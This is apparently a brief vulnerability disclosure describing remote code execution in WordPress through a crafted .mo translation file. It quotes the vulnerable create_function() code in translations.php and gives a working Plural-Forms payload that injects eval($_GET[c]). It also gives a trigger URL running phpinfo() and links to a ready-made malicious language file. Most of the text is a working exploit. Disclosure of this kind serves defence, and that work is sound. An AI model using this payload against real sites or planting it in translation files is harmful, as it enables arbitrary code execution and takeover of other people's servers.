WordPress RCE via specially crafted .mo language file
The vulnerability code in wp-includes/pomo/translations.php:
function make_plural_form_function($nplurals, $expression) {
$expression = str_replace('n', '$n', $expression);
$func_body = "
\$index = (int)($expression);
return (\$index < $nplurals)? \$index : $nplurals - 1;";
return create_function('$n', $func_body);
}
PHP's create_function() function internally performs zend_eval_stringl(), so an attacker can use }
close the anonymous function and execute arbitrary code in the process of creating the anonymous function :-)
PoC:
Plural-Forms: nplurals=1; plural=n);}eval($_GET[c]);/*;
I provide crafted .mo language file, you can set default language to chinese, then access to the following URL and the phpinfo() function will be executed.
/index.php?c=phpinfo();
The crafted .mo language file: https://drive.google.com/file/d/0ByqJ6Vtb_VsYbkw5U0F4QzBrUnM